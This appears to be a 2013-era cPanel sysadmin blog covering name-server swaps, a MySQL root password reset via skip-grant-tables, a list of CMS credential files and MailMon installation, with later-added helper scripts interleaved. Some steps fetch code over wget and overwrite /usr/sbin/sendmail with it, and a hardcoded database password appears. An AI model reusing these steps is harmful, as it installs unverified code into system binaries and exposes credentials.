for i in $(cat account); do sed -i -e "s/ns1.privatedns.com/ns3.flashattractions.com/g" "/var/named/$i"; done
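A plain substitution like the loop above changes the NS records but leaves each zone's SOA serial untouched, so secondary name servers will not transfer the new data. The script below is an added example, not the post's own script: it replaces one name server with another in a BIND zone file (with the dots escaped so the pattern cannot match unrelated names) and increments the serial on the line cPanel tags with "; Serial". The zone file embedded in it is constructed; replace_ns, zone_serial and zone_ns are my own helper names, and the loop at the end shows how they would be applied across /var/named.

```shell
#!/bin/sh
# Added example, not code from the original post: name server change with
# SOA serial bump, for zone files in the layout cPanel writes.

# Constructed zone file using the documentation prefix 192.0.2.0/24.
SAMPLE_ZONE='$TTL 14400
example.com.    86400   IN  SOA ns1.privatedns.com. root.example.com. (
                2013032501 ; Serial
                86400      ; Refresh
                7200       ; Retry
                3600000    ; Expire
                86400 )    ; Minimum
example.com.    86400   IN  NS  ns1.privatedns.com.
example.com.    86400   IN  NS  ns2.privatedns.com.
example.com.    14400   IN  A   192.0.2.10'

# zone_serial FILE: print the serial from the line tagged "; Serial".
zone_serial() {
    awk '/; Serial/ { print $1 }' "$1"
}

# zone_ns FILE: print the targets of the zone's NS records.
zone_ns() {
    awk '$4 == "NS" { print $5 }' "$1"
}

# replace_ns FILE OLD NEW
# Replace every occurrence of OLD (also in the SOA MNAME, as the post's loop
# does) with NEW, then add one to the serial so secondaries pick up the change.
# Written through a temp file rather than sed -i, which differs between
# GNU and BSD sed.
replace_ns() {
    file=$1
    old=$(printf '%s' "$2" | sed 's/\./\\./g')
    new=$3
    sed "s/$old/$new/g" "$file" |
        awk '/; Serial/ { sub(/[0-9]+/, $1 + 1) } { print }' > "$file.tmp" &&
        mv "$file.tmp" "$file"
}

# Stand-alone demonstration on the constructed zone.
demo=$(mktemp)
printf '%s\n' "$SAMPLE_ZONE" > "$demo"
replace_ns "$demo" ns1.privatedns.com ns3.flashattractions.com
echo "serial now $(zone_serial "$demo"); NS: $(zone_ns "$demo" | tr '\n' ' ')"
rm -f "$demo"

# Server-wide application would be:
# for z in /var/named/*.db; do replace_ns "$z" ns1.privatedns.com ns3.flashattractions.com; done
# followed by rndc reload (or /scripts/restartsrv_named on cPanel).
```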

MYSQL Issue:- ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)

[root@servert1 ~]# /etc/init.d/mysqld stop
Stopping MySQL: [ OK ]
[root@servert1 ~]# mysqld_safe --skip-grant-tables &
[1] 13694
[root@servert1 ~]# Starting mysqld daemon with databases from /var/lib/mysql

[root@servert1 ~]# mysql -u root
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1
Server version: 5.0.77 Source distribution

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> update user set password=PASSWORD("testpass") where User='root';
ERROR 1046 (3D000): No database selected
mysql> show databases;

+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| test |
+--------------------+
3 rows in set (0.13 sec)
mysql> use mysql; 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+---------------------------+

| Tables_in_mysql |
+---------------------------+
| columns_priv |
| db |
| func |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| proc |
| procs_priv |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
| user |
+---------------------------+
17 rows in set (0.00 sec)


mysql> update user set password=PASSWORD("testpass") where User='root';
Query OK, 3 rows affected (0.05 sec)
Rows matched: 3 Changed: 3 Warnings: 0

mysql> flush privileges;
Query OK, 0 rows affected (0.04 sec)

mysql> quit
Bye
[root@servert1 ~]# /etc/init.d/mysql restart
bash: /etc/init.d/mysql: No such file or directory
[root@servert1 ~]# /etc/init.d/mysqld restart
STOPPING server from pid file /var/run/mysqld/mysqld.pid
101120 04:17:15 mysqld ended
Stopping MySQL: [ OK ]
Starting MySQL: [ OK ]

[1]+ Done mysqld_safe --skip-grant-tables
[root@servert1 ~]# mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2
Server version: 5.0.77 Source distribution
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.


mysql> quit
Bye

.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable

If you are seeing the error "(13)Permission denied: /home/username/public_html/shop/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable, referer: http://www.yourdomain.com/shop/index.html" in the Apache error log file /usr/local/apache/logs/error_log, and the site is showing a 403 Forbidden error:

First check the permissions of the folder and of the .htaccess file; the folder permission should be 755 and the .htaccess permission 644. Permissions can be changed via FTP or SSH.

If you are still getting the same problem, the FrontPage Extensions may be causing it. To fix:

* Login into your CPanel account
* Click on Frontpage Extensions icon
* Click on Reinstall extensions button beside your problem domain.
* Done.

(make sure to have a backup copy of your data before reinstalling Frontpage)

And the site is showing “403 Forbidden Error”.
At first, I suspect it’s .htaccess problem, but actually it’s caused by Frontpage Extension.

To solve “.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable” follow the steps below:-

* Login into your CPanel account
* Click on “Frontpage Extensions” icon
* Click on “Reinstall extensions” button beside your problem domain.
* If you do not use any FrontPage extensions, it is good to uninstall them.
* Done. The “.htaccess pcfg_openfile: unable to check htaccess file” problem has been fixed.

** If you are not on CPanel hosting, please contact your system administrator to fix the problem. ***

http://help.directadmin.com/item.php?id=363

Thursday, March 21, 2013

Configuration File name for Scripts.

There are many scripts (web applications) available, and each has its own configuration file name. This file is used to update the website's configuration, and it includes the database username and password details.

If you have root or shell access you can locate the file with the command below, but make sure you are in the correct document root of the domain.
find . -type f -name "config_file"
i.e.
find . -type f -name "wp-config.php"

Below are the configuration file names for the scripts.

WordPress >> wp-config.php

Joomla >> configuration.php

Drupal >> sites/default/settings.php

osCommerce >> includes/configure.php, admin/includes/configure.php

Cube Cart >> includes/global.inc.php

Zen Cart >> includes/configure.php, admin/includes/configure.php

PHPlist >> config/config.php

Magento >> app/etc/local.xml

Mambo >> configuration.php

MyBB >> inc/config.php

SMF >> Settings.php

Soholaunch >> sohoadmin/config/isp.conf.php

B2 Evolution >> conf/_basic_config.php

Boonex Dolphin >> inc/header.inc.php

Coppermine Photo Gallery >> include/config.inc.php

dotProject >> includes/config.php

FAQMasterFlex >> faq_config.php

Geeklog >> db-config.php, siteconfig.php, ib-common.php

Noahs Classifieds >> app/config.php

Moodle >> config.php

Gallery >> config.php

Nucleus >> config.php

PHP-Nuke >> config.php

phpBB >> config.php

Post-Nuke >> config.php

Siteframe >> config.php

phpWCMS >> include/inc_conf/conf.inc.php

phpWebSite >> conf/config.php

PhpWiki >> admin.php, lib/config.php

TYPO3 >> typo3conf/localconf.php

vBulletin >> includes/config.php

WebCalendar >> includes/settings.php

Xoops >> mainfile.php
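The list above doubles as a checklist for a permissions audit: each of these files holds the database credentials for its application, and on a shared host a config file readable by "other" may be readable by other accounts on the same server. The script below is an added example, not from the original post: it walks a document root for the config files named above (a subset, to keep it short), reports which are present, and flags any that are world-readable. The function names, the CMS_CONFIGS table format and the test layout are my own.

```shell
#!/bin/sh
# Added example, not code from the original post: find CMS configuration
# files under a document root and flag the ones readable by "other".

# CMS name and relative config path, one pair per line (subset of the list
# on this page).
CMS_CONFIGS='WordPress wp-config.php
Joomla configuration.php
Drupal sites/default/settings.php
Magento app/etc/local.xml
phpBB config.php
vBulletin includes/config.php'

# find_cms_configs DOCROOT
# Print "CMS relative-path" for every known config file present under DOCROOT.
find_cms_configs() {
    root=$1
    printf '%s\n' "$CMS_CONFIGS" | while read -r cms rel; do
        if [ -f "$root/$rel" ]; then
            printf '%s %s\n' "$cms" "$rel"
        fi
    done
}

# other_readable FILE: 0 if the mode has the o+r bit set, 1 otherwise.
# find -perm with a symbolic mode is POSIX, unlike stat's format flags.
other_readable() {
    [ -n "$(find "$1" -perm -o+r -print 2>/dev/null)" ]
}

# audit_cms_configs DOCROOT
# One line per config file found: "OK CMS path" or "WORLD-READABLE CMS path".
audit_cms_configs() {
    root=$1
    find_cms_configs "$root" | while read -r cms rel; do
        if other_readable "$root/$rel"; then
            printf 'WORLD-READABLE %s %s\n' "$cms" "$rel"
        else
            printf 'OK %s %s\n' "$cms" "$rel"
        fi
    done
}

# Stand-alone demonstration on a constructed document root.
demo=$(mktemp -d)
mkdir -p "$demo/sites/default"
printf '<?php\n' > "$demo/wp-config.php"
printf '<?php\n' > "$demo/sites/default/settings.php"
chmod 644 "$demo/wp-config.php"
chmod 600 "$demo/sites/default/settings.php"
audit_cms_configs "$demo"
rm -rf "$demo"
```

On a cPanel box the natural loop is over /home/*/public_html; anything reported WORLD-READABLE is a candidate for chmod 640 (or 600 if the web server runs as the account user under suPHP or CageFS).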

 

 

Directory Structure of Cpanel

=> Apache
==========
/usr/local/apache
+ bin- apache binaries are stored here – httpd, apachectl, apxs
+ conf – configuration files – httpd.conf
+ cgi-bin
+ domlogs – domain log files are stored here
+ htdocs
+ include – header files
+ libexec – shared object (.so) files are stored here – libphp4.so,mod_rewrite.so
+ logs – apache logs – access_log, error_log, suexec_log
+ man – apache manual pages
+ proxy -
+ icons -
Init Script :/etc/rc.d/init.d/httpd – apache start script
Cpanel script to restart apache – /scripts/restartsrv_httpd
==========================================================
=> Exim
=========
Conf : /etc/exim.conf – exim main configuration file
/etc/localdomains – list of domains allowed to relay mail
Log : /var/log/exim_mainlog – incoming/outgoing mails are logged here
/var/log/exim_rejectlog – exim rejected mails are reported here
/var/log/exim_paniclog – exim errors are logged here
Mail queue: /var/spool/exim/input
Cpanel script to restart exim – /scripts/restartsrv_exim
Email forwarders and catchall address file – /etc/valiases/domainname.com
Email filters file – /etc/vfilters/domainname.com
POP user authentication file – /home/username/etc/domainname/passwd
catchall inbox – /home/username/mail/inbox
POP user inbox – /home/username/mail/domainname/popusername/inbox
POP user spambox – /home/username/mail/domainname/popusername/spam
Program : /usr/sbin/exim (suid – -rwsr-xr-x 1 root root )
Init Script: /etc/rc.d/init.d/exim
==========================================================
=> ProFTPD
============
Program :/usr/sbin/proftpd
Init Script :/etc/rc.d/init.d/proftpd
Conf: /etc/proftpd.conf
Log: /var/log/messages, /var/log/xferlog
FTP accounts file – /etc/proftpd/username – all ftp accounts for the domain are listed here
==========================================================
=> Pure-FTPD
=============
Program : /usr/sbin/pure-ftpd
Init Script :/etc/rc.d/init.d/pure-ftpd
Conf: /etc/pure-ftpd.conf
Anonymous ftp document root – /etc/pure-ftpd/ip-address
==========================================================
=> Frontpage Extensions
=========================
Program – (Install): /usr/local/frontpage/version5.0/bin/owsadm.exe
Uninstall and then install for re-installations
FP files are found as _vti-bin, _vti-pvt, _vti-cnf, vti-log inside the public_html
==========================================================
=> Mysql
===========
Program : /usr/bin/mysql
Init Script : /etc/rc.d/init.d/mysql
Conf : /etc/my.cnf, /root/.my.cnf
Data directory – /var/lib/mysql – Where all databases are stored.
Database naming convention – username_dbname (eg: john_sales)
Permissions on databases – drwx 2 mysql mysql
Socket file – /var/lib/mysql/mysql.sock, /tmp/mysql.sock
==========================================================
=> SSHD
===========
Program :/usr/local/sbin/sshd
Init Script :/etc/rc.d/init.d/sshd
/etc/ssh/sshd_config
Log: /var/log/messages
==========================================================
=> Perl
===========
Program :/usr/bin/perl
Directory :/usr/lib/perl5/5.8.8/
==========================================================
=> PHP
==========
Program :/usr/local/bin/php, /usr/bin/php
ini file: /usr/local/lib/php.ini – apache must be restarted after any change to this file
php can be recompiled using /scripts/easyapache
==========================================================
=> Named(BIND)
================
Program: /usr/sbin/named
Init Script: /etc/rc.d/init.d/named
/etc/named.conf
db records:/var/named/
/var/log/messages
==============================================
==>> Cpanel installation directory structure
==============================================
/usr/local/cpanel
+ 3rdparty/ – tools like fantastico, mailman files are located here
+ addons/ – AdvancedGuestBook, phpBB etc
+ base/ – phpmyadmin, squirrelmail, skins, webmail etc
+ bin/ – cpanel binaries
+ cgi-sys/ – cgi files like cgiemail, formmail.cgi, formmail.pl etc
+ logs/ – cpanel access log and error log
+ whostmgr/ – whm related files
==========================================================
=> WHM related files
=======================
/var/cpanel – whm files
+ bandwidth/ – rrd files of domains
+ username.accts – reseller accounts are listed in this file
+ packages – hosting packages are listed here
+ root.accts – root owned domains are listed here
+ suspended – suspended accounts are listed here
+ users/ – cpanel user files – theme, bwlimit, addon, parked and sub-domains are all listed in these files
+ zonetemplates/ – dns zone template files are taken from here
==========================================================
=> Common CPanel scripts
==========================
cpanel/whm Scripts are located in /scripts/
+ addns – add a dns zone
+ addfpmail – Add frontpage mail extensions to all domains without them
+ addfpmail2 – Add frontpage mail extensions to all domains without them
+ addnetmaskips – Add the netmask 255.255.255.0 to all IPs that have no netmask
+ addnobodygrp – Adds the group nobody and activates security
+ addpop – add a pop account
+ addservlets – Add JSP support to an account (requires tomcat)
+ addstatus – (Internal use never called by user)
+ adduser – Add a user to the system
+ bandwidth – (OLD)
+ betaexim – Installs the latest version of exim
+ biglogcheck – looks for logs nearing 2 gigabytes in size
+ bsdcryptoinstall – Installs crypto on FreeBSD
+ bsdldconfig – Configures the proper lib directories in FreeBSD
+ bsdpkgpingtest – Tests the connection speed for downloading FreeBSD packages
+ buildbsdexpect – Install expect on FreeBSD
+ builddomainaddr – (OLD)
+ buildeximconf – Rebuilds exim.conf
+ buildpostgrebsd-dev – Installs postgresql on FreeBSD.
+ chcpass – change cpanel passwords
+ easyapache – recompile/upgrade apache and/or php
+ exim4 – reinstall exim and fix permissions
+ fixcommonproblems – fixes most common problems
+ fixfrontpageperm – fixes permission issues with Front Page
+ fixmailman – fixes common mailman issues
+ fixnamed – fixes common named issues
+ fixndc – fixes rndc errors with named
+ fixquotas – fixes quota problems
+ fullhordereset – resets horde database to a fresh one – all previous user data are lost
+ initquotas – initializes quotas
+ installzendopt – installs zend optimizer
+ killacct – terminate an account – make sure you take a backup of the account first
+ mailperm – fixes permission problems with inboxes
+ park – to park a domain
+ pkgacct – used to backup an account
+ restartsrv – restart script for services
+ restorepkg – restores an account from a backup file ( pkgacct file)
+ runlogsnow – update logs of all users
+ runweblogs – update stats for a particular user
+ securetmp – secures /tmp partition with options noexec and nosuid
+ suspendacct – suspends an account
+ unsuspendacct – unsuspends a suspended account
+ upcp – updates cpanel to the latest version
+ updatenow – updates the cpanel scripts
+ updateuserdomains – updates userdomain entries
==========================================================
=> Important cpanel/whm files
================================
/etc/httpd/conf/httpd.conf – apache configuration file
/etc/exim.conf – mail server configuration file
/etc/named.conf – name server (named) configuration file
/etc/proftpd.conf – proftpd server configuration file
/etc/pure-ftpd.conf – pure-ftpd server configuration file
/etc/valiases/domainname – catchall and forwarders are set here
/etc/vfilters/domainname – email filters are set here
/etc/userdomains – all domains are listed here – addons, parked,subdomains along with their usernames
/etc/localdomains – exim related file – all domains should be listed here to be able to send mails
/var/cpanel/users/username – cpanel user file
/var/cpanel/cpanel.config – cpanel configuration file ( Tweak Settings )*
/etc/cpbackup-userskip.conf -
/etc/sysconfig/network – Networking Setup*
/etc/hosts -
/var/spool/exim -
/var/spool/cron -
/etc/resolv.conf – Networking Setup–> Resolver Configuration
/etc/nameserverips – Networking Setup–> Nameserver IPs ( For resellers to give their nameservers )
/var/cpanel/resellers – For addpkg, etc permissions for resellers.
/etc/chkserv.d – Main >> Service Configuration >> Service Manager *
/var/run/chkservd – Main >> Server Status >> Service Status *
/var/log/dcpumon – top log process
/root/cpanel3-skel – skel directory. Eg: public_ftp, public_html. (Account Functions–>Skeleton Directory )*
/etc/wwwacct.conf – account creation defaults file in WHM (Basic cPanel/WHM Setup)*
/etc/cpupdate.conf – Update Config *
/etc/cpbackup.conf – Configure Backup*
/etc/clamav.conf – clamav (antivirus configuration file )
/etc/my.cnf – mysql configuration file
/usr/local/Zend/etc/php.ini OR /usr/local/lib/php.ini – php configuration file
/etc/ips – ip addresses on the server (except the shared ip) (IP Functions–>Show IP Address Usage )*
/etc/ipaddrpool – ip addresses which are free
/etc/ips.dnsmaster – name server ips
/var/cpanel/Counters – counters for each user
/var/cpanel/bandwidth – bandwidth usage of domains

Check Repair & Optimize mysql Databases


You can use either mysqlcheck or myisamchk to check and/or repair database tables. They are similar in purpose, but there are essential differences: both can check, repair and analyze MyISAM tables, while mysqlcheck can also check InnoDB tables. So if a database uses an engine other than MyISAM, i.e. InnoDB, use the mysqlcheck command.
———————————————————————————————————
++  Check, Repair and Optimize Using mysqlcheck cmd:
———————————————————————————————————

+  Check, repair and optimize all tables in all databases on a MySQL server running on Linux.
# mysqlcheck --auto-repair --check --optimize --all-databases

OR
# mysqlcheck --all-databases -r   #repair databases
# mysqlcheck --all-databases -a   #analyze databases
# mysqlcheck --all-databases -o   #optimize databases

=> Check, repair and optimize the tables of a single database.
# mysqlcheck --auto-repair --check --optimize CpanelUsername_Databasename
# mysqlcheck -ro CpanelUsername_Databasename

=> To repair One Table in database:
# mysqlcheck -ro CpanelUsername_Databasename table_name

———————————————————————————————————
++  Check, Repair and Optimize Using myisamchk cmd:
———————————————————————————————————
=> For All tables in All Databases:

Shows you which tables need repair:
# myisamchk --check /var/lib/mysql/*/*.MYI


Then try ‘safe-recover’ first:
# myisamchk --safe-recover /var/lib/mysql/*/*.MYI

If that does not work, try ‘recover’:
# myisamchk --recover /var/lib/mysql/*/*.MYI

and, if neither “safe-recover” nor “recover” works, use the ‘force’ flag:
# myisamchk --recover --extend-check --force /var/lib/mysql/*/*.MYI

=> For Single Database:
myisamchk -r /var/lib/mysql/[CpanelUsername_Databasename]/*
OR


cd /var/lib/mysql/[CpanelUsername_Databasename]/
To check the tables:
# myisamchk *.MYI
To repair tables:
# myisamchk -r *.MYI


Note: You can use the mysqlcheck or myisamchk command line options as per your requirement.

Assign/change a website’s IP address on a cPanel server via cmd

# /usr/local/cpanel/bin/setsiteip -u $user $ip
$user is the cPanel username and $ip is the dedicated/shared IP

e.g: # /usr/local/cpanel/bin/setsiteip -u linucha 76.74.254.123

Change cPanel password from Cmd:


1) You can change the cPanel password with the command below. You also need to synchronize the password with the default FTP user if you cannot connect to the FTP account with the new password.

# /scripts/chpass Username Password

Username : cPanel account username
Password : New password that to be set

Note: Your password should not contain special characters

2) Synchronize the new password with the default FTP user

# /scripts/ftpupdate

Account Creation Status: failed (Unable to validate setting for cpmod...) ==cpanel /scripts/restorepkg error

Extracting tarball................... ............... ............... Done
Extracting Domain....Done
Generating Account....

Account Creation Status: failed (Unable to validate setting for cpmod...)

Extract Failed
Invalid Account

Solution:

1) To resolve this issue, first extract the backup file into a test directory.

2) Change into the directory you just extracted, then into its cp directory.

3) There you will find a file named after the cPanel username. Edit that file and check for

FEATURELIST and RS

If these values are something custom, set them as:

FEATURELIST=default
RS=x3

Save the file, compress the backup again and try to restore it.

It should get restored without any issues.
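The three manual steps above can be scripted so that the fix is repeatable across many accounts. The following is an added example, not part of the original post or of cPanel's own tooling: it assumes the backup is a .tar.gz that unpacks to a single top-level directory containing a cp/ subdirectory with the <username> settings file, leaves the original tarball untouched, and writes a repaired copy beside it.

```shell
#!/bin/sh
# Added example, not from the original post: automate the manual fix above
# for a pkgacct/cpmove tarball whose cp/<username> file carries a custom
# FEATURELIST or RS value. Assumptions: the tarball is gzip-compressed and
# unpacks to <topdir>/cp/<username>; only tar, sed, find and mktemp are
# needed. The original tarball is never modified.

# fix_cpmod_backup BACKUP.tar.gz
# Prints the path of the repaired tarball. Returns 1 when no cp/<user>
# file is found inside the backup, 2 when the argument is not a file.
fix_cpmod_backup() {
    backup=$1
    [ -f "$backup" ] || { echo "not a file: $backup" >&2; return 2; }
    work=$(mktemp -d)                       # step 1: scratch test directory
    tar -xzf "$backup" -C "$work"
    # Step 2/3: the account file lives exactly at <topdir>/cp/<username>,
    # so restrict the search to that depth and ignore any other "cp" dirs.
    cpfile=$(find "$work" -mindepth 3 -maxdepth 3 -path '*/cp/*' -type f | head -n 1)
    if [ -z "$cpfile" ]; then
        echo "no cp/<username> file inside $backup" >&2
        rm -rf "$work"
        return 1
    fi
    # Reset only the two settings the restore could not validate; every
    # other line is kept verbatim. sed -i is not portable, so go via a temp.
    sed -e 's/^FEATURELIST=.*/FEATURELIST=default/' \
        -e 's/^RS=.*/RS=x3/' "$cpfile" > "$cpfile.tmp" && mv "$cpfile.tmp" "$cpfile"
    # Recompress from inside the scratch dir so the top-level name is kept.
    fixed="${backup%.tar.gz}-fixed.tar.gz"
    (cd "$work" && tar -czf - *) > "$fixed"
    rm -rf "$work"
    echo "$fixed"
}

# Usage: sh fix_cpmod_backup.sh cpmove-USERNAME.tar.gz
for b in "$@"; do
    fix_cpmod_backup "$b" || echo "$b: not repaired" >&2
done
```

After it prints the new path, run /scripts/restorepkg against the -fixed tarball; if that still fails, the original is intact for a second look.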

Wednesday, March 20, 2013

install php shield in phpmotion

Installing phpShield Loaders
The first thing we need to do is check a couple of PHP settings. The easiest way to do this is with a phpinfo file. If you don't know how to create a phpinfo file, you can
Now that you have a phpinfo file, upload it to your website's public_html directory and view it in your browser by typing http://www.yoursite.com/phpinfo.php in your address bar. You want to find/verify the following in your phpinfo.php file:
Your PHP version
Thread Safety is disabled
enable_dl is set to on
The path to your extension_dir
Path to your php.ini file
Now connect to your webserver using your favorite SSH client and login as root.
Create a new working directory then change directories:

mkdir ~/phpshield
cd ~/phpshield

Download the phpSHIELD loaders:

wget http://phpshield.com/loaders/phpshield.loaders.linux.zip

or if you have a 64 bit OS (most people will have a 32 bit OS so you will most likely use the code above)

wget http://phpshield.com/loaders/phpshield.loaders.linux-64.zip

Extract the loaders:

unzip phpshield.loaders.linux.zip

If you do a directory list: ls

you will see a bunch of files named phpshield.4.3.lin to phpshield.5.2.lin.

What we want to do here is find the phpshield file with the number that matches your PHP version. You can find your PHP version at the very top of your phpinfo file from earlier.
Now we need to copy the appropriate phpshield loader file to your PHP extensions directory.

cp ~/phpshield/phpshield.x.x.lin /path/to/your/php/extensions/directory

Replace x.x above with your PHP version and use the path to your PHP extensions directory (you should have found this in step 2 above.)

Open your php.ini file

nano /path/to/php/ini/php.ini

 

You should have found the path to your php.ini file in your phpinfo.php file from earlier.

Append the following to the Dynamic Extensions section of your php.ini file:

extension=phpshield/phpshield.x.x.lin

Replace x.x with the number on the phpshield file you moved earlier.
Finally, restart httpd: /etc/rc.d/init.d/httpd restart

func setlocale(ru_RU.CP1251) php

localedef --no-archive -c -i ru_RU -f CP1251 ru_RU.cp1251

Sunday, March 10, 2013

How to enable/Disable cPanel webmail interface for a user account or in server.

A customer wants to enable only the Horde webmail interface for his domain and disable the rest. Usually there are three webmail clients (Horde, SquirrelMail, RoundCube). However, I was asked to make sure that a specific customer does not see more than the one specified. I enabled the “AUTOLOAD” option in the webmail interface, but he was not satisfied and came back asking to allow only the Horde interface for his webmail. How should I do that?

Solution: Suppose my domain name is “hemanth.com” and my account name is “hemanth”. Now follow the steps below.

This option is for that particular user account:
1) SSH to your server
2) cd /var/cpanel/users/
3) vi hemanth
4) Paste the following lines
skiphorde=0
skipsqmail=1
skiprcmail=1



Note: The value 0 enables a client and 1 disables it. With the lines above only Horde is enabled in webmail; RoundCube and SquirrelMail are disabled.


5) Then restart the cpanel service
/etc/init.d/cpanel restart


Now login to your webmail and check for the option.


This will change the setting server-wide for all domains on the server:
1) Login to your WHM
2) Go to “Server Configuration”
3) Click on “Tweak Settings”
4) Select the Mail option.
5) Turn off “RoundCube” and “SquirrelMail”
6) Save it.

Redirections

http://your-domain.com:2095/3rdparty/roundcube/index.php
http://your-domain.com:2095/horde/login.php


http://your-domain.com:2095/3rdparty/squirrelmail/src/login.php


Note: You must replace your-domain.com with your actual domain name in the above examples.
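As a command-line check for the per-account steps above (instead of logging in to webmail), here is an added example that is not part of the original post: it reads the skip* keys from a /var/cpanel/users file and reports which webmail clients the account can still see. It assumes the file is plain KEY=VALUE lines and that an absent skip* key means the client is not skipped; the sample user file it is run against is constructed.

```shell
#!/bin/sh
# Added example, not from the original post: report which webmail clients a
# cPanel account can see by reading skiphorde/skipsqmail/skiprcmail from its
# /var/cpanel/users file. Assumes KEY=VALUE lines; a missing key counts as 0
# (not skipped), which is how an untouched account behaves.

# skip_value KEY FILE -> prints KEY's value, or 0 when KEY is absent.
# The last occurrence wins, matching "append a line to the file" edits.
skip_value() {
    v=$(sed -n "s/^$1=//p" "$2" | tail -n 1)
    echo "${v:-0}"
}

# webmail_status USERFILE
# Prints "<client> enabled|disabled" for horde, squirrelmail and roundcube.
webmail_status() {
    f=$1
    [ -f "$f" ] || { echo "no such user file: $f" >&2; return 2; }
    for pair in horde:skiphorde squirrelmail:skipsqmail roundcube:skiprcmail; do
        client=${pair%%:*}
        key=${pair#*:}
        if [ "$(skip_value "$key" "$f")" = "1" ]; then
            echo "$client disabled"
        else
            echo "$client enabled"
        fi
    done
}

# only_webmail_client USERFILE CLIENT
# Returns 0 when CLIENT is the single client left enabled, 1 otherwise.
only_webmail_client() {
    [ "$(webmail_status "$1" | grep -c ' enabled$')" -eq 1 ] &&
        webmail_status "$1" | grep -qx "$2 enabled"
}

# Demo on a constructed user file (not a real account).
demo=$(mktemp)
printf 'DNS=hemanth.com\nskiphorde=0\nskipsqmail=1\nskiprcmail=1\n' > "$demo"
webmail_status "$demo"
if only_webmail_client "$demo" horde; then
    echo "only Horde is offered, as requested"
fi
rm -f "$demo"
```

To check a live account, point it at the real file: webmail_status /var/cpanel/users/hemanth; the only_webmail_client form is handy in a loop over /var/cpanel/users/* to confirm a server-wide change took effect everywhere.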

Php.ini using .htaccess

http://www.suphp.org/DocumentationView.html?file=apache/CONFIG

If you want to use "/path/to/server/config/php.ini", put

suPHP_ConfigPath /path/to/server/config

in .htaccess

Saturday, March 9, 2013

Htop installation

Htop is an interactive, real-time process monitor for Linux. It shows the complete list of running processes and is easy to use for everyday tasks, including with the mouse for those who prefer it. You can scroll vertically to view the full process list, and horizontally to view the full command line of a process.

Install Htop from source

Download the htop source from : http://sourceforge.net/projects/htop/

cd /usr/src/
wget -O htop-0.8.3.tar.gz 'http://downloads.sourceforge.net/project/htop/htop/0.8.3/htop-0.8.3.tar.gz?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fhtop%2F&ts=1283665168&use_mirror=cdnetworks-kr-2'
tar zxvf htop-0.8.3.tar.gz
cd htop-0.8.3
yum install ncurses-devel
./configure
make all
make install


Htop installation on 64bit centos version 6 RPM Package


wget http://apt.sw.be/redhat/el6/en/x86_64/rpmforge/RPMS/htop-0.9-1.el6.rf.x86_64.rpm
rpm -i htop-0.9-1.el6.rf.x86_64.rpm


Htop installation on 32bit centos version 6 RPM Package

wget http://apt.sw.be/redhat/el6/en/i386/rpmforge/RPMS/htop-0.9-1.el6.rf.i686.rpm
rpm -i htop-0.9-1.el6.rf.i686.rpm


Htop installation on 64bit centos RPM Package

and if your linux centos version is 64bit use this instead:

wget http://packages.sw.be/htop/htop-0.8.3-1.el5.rf.x86_64.rpm
rpm -i htop-0.8.3-1.el5.rf.x86_64.rpm


Htop Installation on 32bit Centos RPM Package


wget http://packages.sw.be/htop/htop-0.8.3-1.rh9.rf.i386.rpm
rpm -i htop-0.8.3-1.rh9.rf.i386.rpm


yum install htop*

How to Use htop

To use htop you can simply run the htop command

htop


There are also other options, for example the delay time, which is -d

htop -d 2


The above sets the refresh delay to 2 seconds

To list only a specific user's processes, use -u, for example: htop -u apache (lists only the processes run by the apache user)

Wednesday, March 6, 2013

MailMon installation

cd /usr/src/
wget http://www.mycutelife.net/sanju/newt...mon_1-3.tar.gz
tar -xvzf mailmon_1-3.tar.gz
cd /usr/src/MailMon
cp -f /usr/sbin/sendmail /usr/sbin/mon.bkp
wget http://www.mycutelife.net/sanju/newt...on/mailmon.new
sed -e "s/opteron.dnsprotect.com/$(hostname)/g" mailmon.new > mailmon.temp
cp -f mailmon.temp /usr/sbin/sendmail
cd /usr/sbin
chown root:mailtrap sendmail
chmod 755 sendmail
chattr +i sendmail
cd /var/log
touch mailmon.log
chmod 622 mailmon.log
touch mailmon.junk
chmod 622 mailmon.junk
mysql
mysql>create database mailmon2005;
mysql>grant all privileges on mailmon2005.* to mailmon2005@localhost identified by '123dsa';
mysql>use mailmon2005;
CREATE TABLE `limits` (
`id` int(11) NOT NULL auto_increment,
`user` varchar(20) NOT NULL default '',
`speedlimit` int(11) NOT NULL default '0',
`seconds` int(11) NOT NULL default '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=6 ;
INSERT INTO `limits` VALUES (6, 'cpanel', 200, 3600);
CREATE TABLE `mailmon` (
`user` varchar(20) NOT NULL default '',
`timestamp` int(10) unsigned NOT NULL default '0',
`script_name` varchar(255) NOT NULL default '',
KEY `user` (`user`,`timestamp`)
) ENGINE=MyISAM;
mysql> quit;

Monday, March 4, 2013

Mysql -> add/drop/grant/revoke/backup/restore.

mysql -u <username> -p
Enter password:

Create database command:
--------------------------------

mysql> CREATE DATABASE <database>;

eg:

mysql> CREATE DATABASE ACCOUNTS;


We can now check for the presence of this database by typing:

mysql> SHOW DATABASES;

+----------+
| Database |
+----------+
| mysql    |
| accounts |
+----------+

USE Database:
-----------------

The USE db_name statement tells MySQL to use the db_name database as the default (current) database for subsequent statements. The database remains the default until the end of the session or until another USE statement is issued:

mysql> USE accounts;
mysql> SELECT COUNT(*) FROM mytable; # selects from accounts.mytable
mysql> USE sales;
mysql> SELECT COUNT(*) FROM mytable; # selects from sales.mytable

Making a particular database current by means of the USE statement does not preclude you from accessing tables in other databases. The following example accesses the author table from the accounts database and the editor table from the sales database:

mysql> USE accounts;
mysql> SELECT author_name,editor_name FROM author,sales.editor
-> WHERE author.editor_id = sales.editor.editor_id;



Delete / Remove database command:
--------------------------------------------

DROP DATABASE <database>

eg:

DROP DATABASE accounts;


Granting Privileges on the new database:
-----------------------------------------------

